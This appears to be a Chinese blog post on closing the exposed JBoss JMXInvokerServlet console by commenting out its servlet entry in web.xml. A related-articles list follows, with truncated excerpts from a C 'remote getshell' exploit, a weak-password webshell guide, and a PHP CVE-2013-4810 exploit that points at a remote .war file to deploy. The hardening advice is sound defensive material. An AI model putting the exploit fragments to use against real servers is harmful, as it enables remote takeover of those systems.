disable jboss JMXInvokerServlet .

jboss 默认有几个控制台,都是可能存在漏洞被黑客利用,除了web console 、jmx console。 还有JMXInvokerServlet,访问路径是ip/invoker/JMXInvokerServlet 。

一开始以为删除对应的deploy文件夹(/deploy/http-invoker.sar/)就可以,但是重启发现有一些异常堆栈,大概意思是找不到类,都是action相关的。查了一些发现这个deploy文件夹的功能包括jndi的proxy binding等,按理说没用到应该没关系。既然报错了,那就另辟蹊径,在/http-invoker.sar/invoker.war/WEB-INF/ 下有web.xml 配置文件,那直接把JMXInvokerServlet这个servlet的相关配置注释掉,重启发现这个控制台已经无法访问,这个安全问题也就修复了

时间: 2024-10-12 13:42:27

disable jboss JMXInvokerServlet .的相关文章

JBOSS安全配置

JBOSS安全配置 概念: JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器. 它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用. 架构 JBoss的模块架构是建立在JMX底层上的.JMX是一个可复用框架,它为远程(Remote)和本地(Local)管理工具扩展了应用.它的架构是层式架构.他们是实现层(instrumentation layer).代理层(agent layer)和发布层(distribution layer).用户使用管理B

Jboss remote getshell (JMXInvokerServlet) vc版

#include "stdafx.h" #include <Windows.h> #include <stdio.h> #include <winhttp.h> #include <comdef.h> #pragma comment (lib,"Winhttp.lib") char shell_invoke[] = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67

JBOSS配置排错

jboss提供了二种运行模式:standalone(独立运行模式).domain(域模式),日常开发中,使用standalone模式足已:但生产部署时,一个app,往往是部署在jboss集群环境中的,如果所有jboss server均采用standalone模式,会给运维带来极大的工作量,需要每台jboss server上逐一部署/更新,显然不适合. domain模式正是为了解决这一问题,该模式下,所有jbossserver可以划分成不同的group(注:这里的jbossserver并不一定要对

Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结 [复制链接]

1.java应用服务器    Java应用服务器主要为应用程序提供运行环境,为组件提供服务.Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器.1.1  常见的Server概述    常见的Java服务器:Tomcat.Weblogic.JBoss.GlassFish.Jetty.Resin.IBM Websphere.Bejy Tiger.Geronimo.Jonas.Jrun.Orion.TongWeb.BES Application Server.Col

[CVE:2013-4810]Apache Tomcat/JBoss远程命令执行

1 <?php 2 3 $host=gethostbyname($argv[1]); 4 $port=$argv[2]; 5 $cmd=$argv[3]; 6 7 8 //small jsp shell 9 //change this if you want, url to the app to be deployed, keep it short 10 $url="http://retrogod.altervista.org/a.war?"; 11 12 13 $url_len

一个jboss启动shell脚本

脚本1: #!/bin/sh # [email protected] #JBOSS_HOME JBOSS_HOME="/opt/app/jboss-eap-6.3" JAVAPTH="/opt/app/jdk1.7.0/bin" case "$1" in start) echo "Starting JBoss EAP-6.3.0..." export RUN_CONF=${JBOSS_HOME}/bin/standalone.

Tomcat,Jboss,Weblogic通过jndi连接数据库

1.  Tomcat配置Jndi数据源 1.1在tomcat服务器的lib目录下加入数据库连接的驱动jar包 1.2修改tomcat服务器的conf目录下server.xml配置文件 编辑server.xml文件,添加全局JNDI数据源配置,配置如下: <GlobalNamingResources> <Resource name="UserDatabase" auth="Container" type="org.apache.catali

JBoss集群中启用HTTPS协议

Generate server certificate Note: If you already have certificate created then this section can be ignored. Generate Private Key on the Server Running Apache + mod_ssl First, generate a private key on the Linux server that runs Apache webserver using

Class loading in JBoss AS 7--官方文档

Class loading in AS7 is considerably different to previous versions of JBoss AS. Class loading is based on the JBoss Modules project. Instead of the more familiar hierarchical class loading environment, AS7's class loading is based on modules that ha